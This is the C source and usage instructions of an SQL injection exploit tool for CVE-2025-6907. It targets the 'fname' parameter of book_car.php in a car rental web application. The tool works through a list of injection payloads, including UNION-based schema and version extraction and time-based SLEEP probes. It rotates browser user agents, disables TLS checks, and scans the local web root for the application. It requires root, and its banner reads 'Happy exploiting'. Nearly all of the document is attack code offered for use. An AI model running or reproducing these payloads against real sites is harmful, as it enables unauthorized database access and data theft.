# gcc exploit.c argparse.c -o CVE‑2025‑6907 -lcurl
# ./CVE‑2025‑6907 -u http://127.0.0.1
1- Verbose Mode :
# ./CVE‑2025‑6907 -u http://127.0.0.1 -v
2- Full url :
# ./CVE‑2025‑6907 -i [FULL_URL]
3- Check files service :
# ./CVE‑2025‑6907 -c
4- Show HTTP responses :
# ./CVE‑2025‑6907 -r -u [TARGET]
File: exploit.c — Size: 30,5 KB — Lines: 896
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>
#include "argparse.h"
#include <unistd.h>
#include <sys/syscall.h>
#include <fcntl.h>
#include <sys/time.h>
#define FULL_URL 4500
#define USE_URL 4096
#define BUF_CHECK_FOLDER 1096
int showResponse = 0;
int useFullurl = 0;
int apacheRunning = 0;
int verbose = 0;
const char *inputUrl = NULL;
void checkSystem()
{
#ifdef _WIN32
printf("\e[1;31m[-] Error Run Exploit !\n");
printf("\e[1;31m[-] Your Os : Windows 32 bit / 64 bit !\n");
printf("\e[1;31m[-] Please Change Your System on Linux !\n");
exit(1);
#elif TARGET_OS_MAC
printf("\e[1;31m[-] Error Run Exploit !\n");
printf("\e[1;31m[-] Your Os : MacOS !\n");
printf("\e[1;31m[-] Please Change Your System on Linux !\n");
exit(1);
#elif __linux__
printf("\e[1;36m[+] Exploit started successfully...\n");
printf("\e[1;36m[+] Your Os : Linux !\n");
#else
printf("\e[1;31m[-] Error Run Exploit !\n");
printf("\e[1;31m[-] Your Os : Unknow Os !\n");
printf("\e[1;31m[-] Please Change Your System on Linux !\n");
exit(1);
#endif
}
struct Mem
{
char *buffer;
size_t len;
};
size_t write_cb(void *ptr,
size_t size,
size_t nmemb,
void *userdata)
{
size_t total = size * nmemb;
struct Mem *m = (struct Mem *)userdata;
char *tmp = realloc(m->buffer,
m->len + total + 1);
if (!tmp) return 0;
m->buffer = tmp;
memcpy(&(m->buffer[m->len]),
ptr,
total);
m->len += total;
m->buffer[m->len] = '\0';
return total;
}
const char *sql_response_signatures[] =
{
"syntax error",
"Warning: mysql_fetch_assoc()",
"Warning: mysqli_query()",
"SQLSTATE",
"Invalid query",
"Unclosed quotation mark",
"quoted string not properly terminated",
"You have an error in your SQL syntax",
"Warning: pg_query()",
"Warning: pg_send_query()",
"pg_query(): Query failed",
"Microsoft OLE DB Provider for SQL Server",
"Incorrect syntax near",
"Unclosed quotation mark after the character string",
"SQL error",
"mysql_num_rows() expects parameter",
"mysql_fetch_array() expects parameter",
"Fatal error",
"mysql_fetch_object() expects parameter",
"mysqli_fetch_assoc() expects parameter",
"mysql_fetch_row() expects parameter",
"supplied argument is not a valid MySQL",
"Warning: mssql_query()",
"syntax error at or near",
"org.hibernate.exception",
"unexpected end of SQL command",
"SQL query failed",
"database query error",
"DB2 SQL error",
"OLE DB provider returned message",
"JDBC SQL error",
"pg_fetch_array() expects parameter",
"pg_fetch_assoc() expects parameter",
"Query execution failed",
"Database error",
"Unhandled Exception",
"ORA-00933: SQL command not properly ended",
"ORA-01756: quoted string not properly terminated",
"SQL Server Error",
"mysql_numrows() expects parameter",
"mysql_num_fields() expects parameter",
"Syntax error or access violation",
"SQL syntax error",
"NativeError",
"ODBC SQL Server Driver",
"Warning: odbc_exec()",
"Warning: odbc_prepare()",
"Fatal error: Call to a member function",
};
const char *a[] =
{
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4043.US Safari/537.36",
"Mozilla/5.0 (Linux; Android 4.4.2; SM-P600 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0",
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.22 Safari/537.36",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36",
"Mozilla/5.0 (X11; CrOS x86_64 6812.88.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.153 Safari/537.36",
"Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0"
};
void agent(CURL *curl)
{
static int c = 0;
static int nma = sizeof(a) / sizeof(a[0]);
const char *us = a[c];
c = (c + 1) % nma;
curl_easy_setopt(curl,
CURLOPT_USERAGENT,
us);
}
const char *payloadSql[] = {
"' OR '1'='1' --+",
"' UNION SELECT NULL,NULL,NULL --+",
"' UNION SELECT NULL,@@version,NULL --+",
"' UNION SELECT NULL,database(),user() --+",
"'/**/UNION/**/SELECT/**/NULL,version(),NULL--+",
"' OR IF(1=1, SLEEP(5), 0)--+",
"' OR IF(ASCII(SUBSTRING((SELECT database()),1,1)) > 64, SLEEP(5), 0)--+",
"\" UNION SELECT NULL,@@version,NULL --+",
"' AND updatexml(1,concat(0x7e,(SELECT user()),0x7e),1) --+",
"' OR IF(1=1, SLEEP(3), 0) --+",
"'; SELECT user(); --+",
"' UNION SELECT 1,2,0x6461746162617365 --+",
"' UNION SELECT table_name,column_name,NULL FROM information_schema.columns WHERE table_schema=database() --+"
};
int numberKey = sizeof(sql_response_signatures) / sizeof(sql_response_signatures[0]);
void e(const char *baseUrl)
{
char full[FULL_URL];
CURL *curl = curl_easy_init();
struct Mem chunk = { NULL, 0 };
long ht = 0;
if (!curl)
{
printf("\e[1;31m[-] Error Create Object Curl.\n");
printf("\e[1;31m[-] Please Check Your Connection, (Ex command : ip show)\n");
printf("\e[1;33m[-] Run Command ip show ...\n");
const char *command = "ip show";
const char *argv[] = { NULL, command };
const char *envp[] = { NULL };
__asm__ volatile
(
"mov $59, %%rax\n\t"
"mov %[command], %%rdi\n\t"
"mov %[argv], %%rsi\n\t"
"mov %[envp], %%rdx\n\t"
"syscall\n\t"
"mov $60, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
:[command] "r" (command),
[argv] "r" (argv),
[envp] "r" (envp)
:"rax", "rdi", "rsi", "rdx"
);
goto exit;
}
curl_easy_setopt(curl,
CURLOPT_ACCEPT_ENCODING,
"");
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&chunk);
curl_easy_setopt(curl,
CURLOPT_CONNECTTIMEOUT,
5L);
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
if (verbose)
{
curl_easy_setopt(curl,
CURLOPT_VERBOSE,
1L);
}
int numberPayload = sizeof(payloadSql) / sizeof(payloadSql[0]);
for (int p = 0; p < numberPayload; ++p)
{
const char *payload = payloadSql[p];
size_t lenPayload = strlen(payload) - 1;
char *esc = curl_easy_escape(curl,
payload,
0);
if (!esc)
{
fprintf(stderr,
"\e[1;31m[-] URL-encoding failed for payload\n");
continue;
}
if (useFullurl)
{
snprintf(full,
sizeof(full),
"%s%s",
baseUrl,
esc);
}
else
{
snprintf(full,
sizeof(full),
"%s/book_car.php?fname=%s",
baseUrl,
esc);
}
if (verbose)
{
printf("\e[1;35m[payload] [%02d] %p-%p %08zx \e[0m\n",
p,
(void*)payload,
(void*)(payload + lenPayload),
lenPayload);
}
curl_free(esc);
struct curl_slist *h = NULL;
h = curl_slist_append(h,
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
h = curl_slist_append(h,
"Accept-Encoding: gzip, deflate, br");
h = curl_slist_append(h,
"Accept-Language: en-US,en;q=0.5");
h = curl_slist_append(h,
"Connection: keep-alive");
h = curl_slist_append(h,
"Referer: http://example.com/");
h = curl_slist_append(h,
"Cache-Control: no-cache");
h = curl_slist_append(h,
"Pragma: no-cache");
curl_easy_setopt(curl,
CURLOPT_HTTPHEADER,
h);
if (chunk.buffer)
{
free(chunk.buffer);
chunk.buffer = NULL;
}
chunk.len = 0;
printf("\e[1;34m[+] Full Format Url : %s", full);
curl_easy_setopt(curl,
CURLOPT_URL,
full);
agent(curl);
struct timeval start, end;
gettimeofday(&start,
NULL);
CURLcode r = curl_easy_perform(curl);
gettimeofday(&end,
NULL);
long elapsed = (end.tv_sec - start.tv_sec) * 1000 +
(end.tv_usec - start.tv_usec) / 1000;
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&ht);
if (elapsed > 4000)
{
printf("\e[1;32m[+] Check Time-Based Blind SQLi on Target...\n");
printf("\e[1;32m[+] Time-Delay Detected (%ld ms)\n");
printf("\e[1;32m[+] Target likely VULNERABLE to Time-Based Blind SQLi!\n", elapsed);
break;
}
if (r != CURLE_OK)
{
printf("\e[1;33m[!] Please Check Your Connection on Server !\n");
printf("\e[1;33m[!] Exemple Command Check Access Connection : ping google.com\n");
printf("\e[1;34m[*] Run Command For Check Your Connection : ping -c 5 8.8.8.8");
const char *command = "/bin/ping";
char *const argv[] = {"ping", "-c", "2", "8.8.8.8", NULL};
const char *envp[] = {NULL};
__asm__ volatile
(
"mov $59, %%rax\n\t"
"mov %[command], %%rdi\n\t"
"mov %[argv], %%rsi\n\t"
"mov %[envp], %%rdx\n\t"
"syscall\n\t"
"mov $60, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
:[command] "r" (command),
[argv] "r" (argv),
[envp] "r" (envp)
:"rax", "rdi", "rsi", "rdx"
);
fprintf(stderr,
"\e[1;31m[-] curl error: %s\n",
curl_easy_strerror(r));
}
else
{
printf("\e[1;34m\n[+] Request Send Success !\n");
printf("\e[1;32m[+] HTTP CODE : %ld\n", ht);
if (ht >= 200 &&
ht <300)
{
printf("\e[1;34m[+] The payload was successfully responded to by the server !\n");
int found = 0;
for (int k = 0; k< numberKey; ++k)
{
if (strstr(chunk.buffer, sql_response_signatures[k]))
{
printf("\e[1;34m[+] A suspicious word was found: %s\n",
sql_response_signatures[k]);
printf("\e[1;34m[+] The server is vulnerable to CVE‑2025‑6907 !\n");
found = 1;
break;
}
}
if (!found)
{
printf("\e[1;31m[-] No suspicious patterns found in response for this payload.\n");
if (showResponse)
{
printf("\e[1;33m-------------------------------- Response Server --------------------------------\n");
printf("%s\n",
chunk.buffer);
printf("\e[1;33m-----------------------------------------------------------------------------------\n");
}
printf("\e[0;36m[*] Trying next payload...\n\n");
printf("\e[1;37m---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n");
}
else
{
if (showResponse)
{
printf("\e[1;33m-------------------------------- Response Server --------------------------------\n", chunk.buffer);
printf("%s",
chunk.buffer);
printf("\e[1;33m-----------------------------------------------------------------------------------\n");
}
goto exit;
}
}
else
{
printf("\e[1;31m[-] Unexpected HTTP code %ld for this payload, trying next...\n\n", ht);
}
}
curl_slist_free_all(h);
h = NULL;
}
printf("\e[1;31m[-] All payloads tested. No SQLi signature detected.\n");
exit:
if (chunk.buffer)
{
free(chunk.buffer);
}
if (curl)
{
curl_easy_cleanup(curl);
}
}
int runS = 0;
int checkFilesInFolder(const char *folderPath)
{
int fd = open(folderPath, O_RDONLY | O_DIRECTORY);
if (fd < 0)
{
perror("[-] Error open folder");
return -1;
}
char buffer[BUF_CHECK_FOLDER];
int nread = syscall(217,
fd,
buffer,
BUF_CHECK_FOLDER);
if (nread <= 0)
{
printf("\e[1;31m[-] Error reading folder content: %s\n", folderPath);
close(fd);
return -1;
}
struct linux_dirent64
{
unsigned long long d_ino;
long long d_off;
unsigned short d_reclen;
unsigned char d_type;
char d_name[];
};
const char *filesToCheck[] =
{
"book_car.php",
"my-booking.php",
"booking.php",
"include",
"admin",
"assets",
"car-listing.php",
"check_availability.php",
"contact-us.php",
"index.php",
"logout.php",
"my-booking.php",
"my-testimonials.php",
"page.php",
"post-testimonial.php",
"profile.php",
"search-carresult.php",
"update-password.php",
"vehical-details.php"
};
const int numberFiles = sizeof(filesToCheck) / sizeof(filesToCheck[0]);
int foundFiles[numberFiles];
memset(foundFiles, 0, sizeof(foundFiles));
int bpos = 0;
while (bpos < nread)
{
struct linux_dirent64 *d = (struct linux_dirent64 *)(buffer + bpos);
for (int i = 0; i < numberFiles; i++) {
if (strcmp(d->d_name, filesToCheck[i]) == 0)
{
foundFiles[i] = 1;
}
}
bpos += d->d_reclen;
}
close(fd);
int showAn = 0;
printf("\e[1;35m\n[+] Step 2 : Check the files inside the folder...\n");
printf("\e[1;37m-----------------------------------------------------------------------------------------------\n");
for (int i = 0; i < numberFiles; i++)
{
if (foundFiles[i])
{
if (!showAn)
{
printf("\e[1;34m[+] Analysis File Code-PROJECTS...\n");
showAn = 1;
}
printf("\e[1;34m[+] Found file code-projects Car : %s/%s\n",
folderPath,
filesToCheck[i]);
if (strcmp(filesToCheck[i], "my-booking.php") == 0||
strcmp(filesToCheck[i], "car-listing.php") == 0||
strcmp(filesToCheck[i], "page.php") == 0)
{
printf("\e[1;33m-----------------------------------Result Check File-----------------------------------\n");
printf("\e[1;34m[+] File my-booking.php : The file that causes the SQL vulnerability\n");
printf("\e[1;34m[+] File page.php : Service display page\n");
printf("\e[1;34m[+] File car-listing.php : Car information file\n");
printf("\e[1;34m[+] All files that confirm the service are present !!\n");
printf("\e[1;33m----------------------------------------------------------------------------------------\n");
break;
}
}
else
{
if (verbose)
{
printf("[-] File not Found : %s\%s\n",folderPath,
filesToCheck[i]);
}
continue;
}
fflush(stdout);
}
return 0;
}
int checkFile()
{
const char *exp = "\e[1;35m[+] Service search argument is enabled on your system";
char buffer[BUF_CHECK_FOLDER];
const char *step1 = "\e[1;33m[+] An attempt to search within the /var/www/html directory has been initiated...\n";
printf("\e[1;35m[+] Step 1 : Check Folder Service ...\n");
size_t step1Len = strlen(step1) - 1;
const char *path = "/var/www/html";
const char *errorMessage = "\e[1;31m[-] Error Check Path /var/www/html !\n";
size_t lenError = strlen(errorMessage);
int fd;
__asm__ volatile (
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[step1], %%rsi\n\t"
"mov %[step1Len], %%rdx\n\t"
"syscall\n\t"
"mov $2, %%rax\n\t"
"mov %[pth], %%rdi\n\t"
"mov $0, %%rsi\n\t"
"mov $0, %%rdx\n\t"
"syscall\n\t"
"cmp $0, %%rax\n\t"
"jl 1f\n\t"
"mov %%eax, %0\n\t"
"jmp 2f\n"
"1:\n\t"
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[err_msg], %%rsi\n\t"
"mov %[err_len], %%rdx\n\t"
"syscall\n\t"
"mov $-1, %%eax\n\t"
"2:\n\t"
: "=r"(fd)
: [step1] "r"(step1),
[step1Len] "r"(step1Len),
[pth] "r"(path),
[err_msg] "r"(errorMessage),
[err_len] "r"(lenError)
: "rax","rdi","rsi","rdx","rcx","r11"
);
int32_t nread;
__asm__ volatile
(
"mov $217, %%rax\n\t"
"syscall\n\t"
: "=a"(nread)
: "D"(fd),
"S"(buffer),
"d"((unsigned long)BUF_CHECK_FOLDER)
: "rcx", "r11"
);
if (nread <= 0)
{
const char *errorContent = "\e[1;31m[-] Error Check Content Folder !\n";
size_t lenCheck = strlen(errorContent);
write(1,
errorContent,
lenCheck);
close(fd);
return -1;
}
struct linux_dirent64
{
unsigned long long d_ino;
long long d_off;
unsigned short d_reclen;
unsigned char d_type;
char d_name[];
};
const char *nameFolder[] =
{
"care",
"online_care",
"online_care_rental",
"rental_care",
"online",
"Care_online",
"my_care",
"car_rental",
"rental_system",
"car_booking",
"book_car",
"booking",
"car_rentals",
"car_rental_system",
"rental",
"car_service",
"rental_service",
"car_rental_app",
"rental_app",
"carrental",
"onlinerental",
"onlinerentalcar",
"rentals",
"carhire",
"autocare",
"carshare",
"online_car_rental",
"vehicles",
"fleet",
"fleet_management",
"car_fleet",
"my_rental",
"online_rent",
"auto_rent",
"car_rental_project",
"online_car_rental_service"
};
const int numberName = sizeof(nameFolder) / sizeof(nameFolder[0]);
int foundName[numberName];
memset(foundName,
0,
sizeof(foundName));
int bpos = 0;
while (bpos < nread) {
struct linux_dirent64 *d = (struct linux_dirent64 *)(buffer + bpos);
for (int i = 0;
i < numberName;
i++)
{
if (strcmp(d->d_name,
nameFolder[i]) == 0)
{
foundName[i] = 1;
}
}
bpos += d->d_reclen;
}
close(fd);
printf("\e[1;37m\n-----------------------------------------------------------------------------------------------\n");
for (int i = 0;
i < numberName;
i++)
{
if (foundName[i])
{
printf("\e[1;34m\n[+] Found folder: %s/%s\n",
path,
nameFolder[i]);
fflush(stdout);
char subfolderPath[512];
snprintf(subfolderPath, sizeof(subfolderPath), "%s/%s", path, nameFolder[i]);
checkFilesInFolder(subfolderPath);
}
//If you want to see the failed attempts
else
{
if (verbose)
{
printf("\e[1;31m\n[-] Not found : %s/%s\n",
path,
nameFolder[i]);
fflush(stdout);
}
}
}
return 0;
}
void checkProccess()
{
FILE *file ;
printf("\e[1;35m[+] Step 3 : Check apache Server on System ...\n");
char buffer[1024];
file = popen("ps aux | grep -i apache | grep -v grep", "r");
if (file == NULL)
{
printf("\e[1;31m[-] Error Open Proccess !\n");
}
while (fgets(buffer, sizeof(buffer), file) != NULL)
{
if (strstr(buffer, "apache2") != NULL || strstr(buffer, "httpd") != NULL) {
apacheRunning = 1;
break;
}
}
pclose(file);
printf("\e[1;34m[+] Try to run Apache...\n");
if (apacheRunning)
{
printf("\e[1;34m[+] Apache is running !\n");
int check = system("systemctl start apache2.service ");
if (check == 0)
{
printf("\e[1;34m[+] Server Apache Run Success !\n");
}
else
{
printf("\e[1;31m[-] Error Run Command systemctl start apache2.service !\n");
}
}
else
{
printf("\e[1;31m[-] Apache is NOT running !\n");
}
}
void runRoot()
{
if (geteuid() != 0)
{
printf("\e[1;31m[-] You need to run this as root !\n");
printf("\e[1;31m[-] Exemple Command : sudo su\n");
printf("\e[1;31m[-] And Run Exploit , Exit...\n");
exit(1);
}
}
void memory(void)
{
FILE *f = fopen("/proc/self/maps", "r");
if (!f)
{
perror("[-] fopen(/proc/self/maps)");
return;
}
printf("\n\e[1;35m========================================[Memory Map]========================================\e[0m\n");
char line[256];
while (fgets(line,
sizeof(line),
f))
{
printf("%s",
line);
}
printf("\e[1;35m=========================================================================================\e[0m\n\n");
fclose(f);
}
void showHelp()
{
printf("\e[1;37m\n[+] Explanation of the arguments:\n");
printf("\e[1;37m\n[+] Explanation of the arguments:\n");
printf("\e[1;37m\t1- *-u / --url:\n");
printf("\e[1;37m\t\tAn argument to pass the base URL pointing to a specific file named 'book_car.php' with a query parameter 'fname'.\n");
printf("\e[1;37m\t\tThe tool appends your input directly to this URL, creating requests like: book_car.php?fname=YOUR_INPUT\n");
printf("\e[1;37m\t\tThis is useful for targeted testing when the vulnerable parameter is 'fname' in 'book_car.php'.\n");
printf("\e[1;37m\t\t[+] Example: ./exploit -u http://127.0.0.1\n\n");
printf("\e[1;37m\t2- *-r / --response:\n");
printf("\e[1;37m\t\tShow HTTP response bodies for each request.\n");
printf("\e[1;37m\t\tHelps inspect server feedback and error messages.\n");
printf("\e[1;37m\t\t[+] Example: ./exploit -u http://127.0.0.1 -r\n\n");
printf("\e[1;37m\t3- *-i / --input:\n");
printf("\e[1;37m\t\tTreat the provided URL as a full URI (including query).\n");
printf("\e[1;37m\t\tUseful for custom endpoints or non-standard paths.\n");
printf("\e[1;37m\t\t[+] Example: ./exploit -u \"http://127.0.0.1/file.php?fname=1' OR '1'='1\" -i\n\n");
printf("\e[1;37m\t4- *-c / --check:\n");
printf("\e[1;37m\t\tPerform service & environment checks (files, folders, Apache).\n");
printf("\e[1;37m\t\tVerifies prerequisites before sending payloads.\n");
printf("\e[1;37m\t\t[+] Example: ./exploit -c\n\n");
printf("\e[1;37m\t5- *-v / --verbose:\n");
printf("\e[1;37m\t\tEnable verbose mode (detailed curl operations & payload mapping).\n");
printf("\e[1;37m\t\tPrints additional debug info such as payload addresses and curl logs.\n");
printf("\e[1;37m\t\t[+] Example: ./exploit -u http://127.0.0.1/book_car.php?fname= -v\n\n");
printf("\e[1;37m-----------------------------------------------------------------------------------------------------------------------------------------------------------\n");
}
int main(int argc,
const char **argv)
{
printf("\e[1;31m"
"⠀⠀⠀⠀⠀⣶⡆⠀⠀⠀⢀⣴⢦⠀⠀⠀⠀⣖⡶⠀⠀⠀⠀⡏⡧⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⢹⣷⡀⠀⠀⢀⣿⣧⡀⠀⠀⢠⣾⣧⠀⠀⠀⣠⣾⡇⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⢸⣿⣿⣦⡀⣼⣿⣿⣷⡀⢠⣿⣿⣿⡆⢀⣾⣿⣿⡇⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⠋⠙⢿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠠⣤⣉⣙⠛⠛⠛⠿⠿⠁⣴⣦⡈⠻⠛⠛⠛⢛⣉⣁⡤⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⠈⠉⠛⠻⠿⠶⣶⣆⠈⢿⡿⠃⣠⣶⡿⠿⠟⠛⠉⠀⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⢠⣿⣿⣶⣶⣤⣤⣤⣤⡀⢁⣠⣤⣤⣤⣶⣶⣿⣿⡀⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⣸⣿⡏⠉⠙⠛⠿⢿⣿⣿⣾⣿⡿⠿⠛⠋⠉⠹⣿⡇⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⠻⢿⣧⣀⠀⠀⣀⣀⣼⡿⣿⣯⣀⣀⠀⠀⣀⣼⡿⠗⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⠀⠀⠙⠻⣿⣿⣿⣿⣿⠁⠘⣿⣿⣿⣿⣿⠟⠉⠀⠀⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⣿⣿⣿⣇⣀⣀⣹⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⠿⣿⡿⢿⣿⠿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⡇⢀⣿⡇⢸⣿⡀⢸⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
"⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠈⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
);
printf("\e[1;31m■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■\n");
printf("■ \e[1;37m BYTE REAPER | CVE-2025-6907 SQLI TOOL \e[1;31m\n");
printf("■ \e[1;32m Target : CODE_PROJECT \e[1;31m\n");
printf("■ \e[1;34m Channel: https://t.me/exploiterX0 \e[1;31m\n");
printf("\e[0;32m■ -> Happy exploiting !!\n");
printf("\e[1;31m■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■\n\n");
printf("\e[1;37m-----------------------------------------------------------------------------------------------------------------------------------------------------------\n");
const char *targetUrl = NULL;
int run = 0;
int showH = 0;
const char *yourUse = NULL;
runRoot();
checkSystem();
struct argparse_option options[] =
{
OPT_BOOLEAN('h',
"help",
&showH,
"Show detailed help"),
OPT_STRING('u',
"url",
&targetUrl,
"Enter Target URL"),
OPT_BOOLEAN('r',
"response",
&run,
"This Argument For Show Response Server"),
OPT_STRING('i',
"input",
&inputUrl,
"Enter FULL URL"),
OPT_BOOLEAN('c',
"check",
&runS,
"Argument to check Service CODE_PROJECT and File,Folder,Apache, process..."),
OPT_BOOLEAN(
'v',
"verbose",
&verbose,
"Verbose Mode"),
OPT_END(),
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
useFullurl = (inputUrl != NULL);
const char *url = inputUrl ? inputUrl : targetUrl;
showResponse = run ;
if(showH)
{
showHelp();
}
if (runS && !url)
{
checkFile();
checkProccess();
return 0;
}
if (!runS && !url)
{
printf("\e[1;31m\n[-] Please Enter Target URL !\n");
printf("\e[1;33m[!] Exemple : ./exploit -u http://192.168.1.100/book_car.php\n");
__asm__ volatile
(
"mov $60, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
:
:"rax", "rdi"
);
}
if (runS && url)
{
checkFile();
checkProccess();
}
if (verbose)
{
verbose = 1;
printf("\e[0;34m[+] Verbose Mode Run...\n");
printf("\e[0;34m[+] Show Memory Location Run...\n");
memory();
}
e(url);
return 0;
}